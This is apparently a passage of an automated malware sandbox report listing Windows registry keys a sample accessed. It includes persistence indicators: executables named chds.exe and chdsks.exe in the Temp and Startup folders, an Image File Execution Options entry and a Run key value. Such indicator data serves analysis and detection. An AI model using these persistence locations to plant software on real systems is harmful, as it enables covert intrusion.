HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|chds.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|chds.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|chds.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1008786c\7da7a542
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1008786c\7ea37736
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chdsks.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|chdsks.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|chdsks.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|chdsks.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chdskskas

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
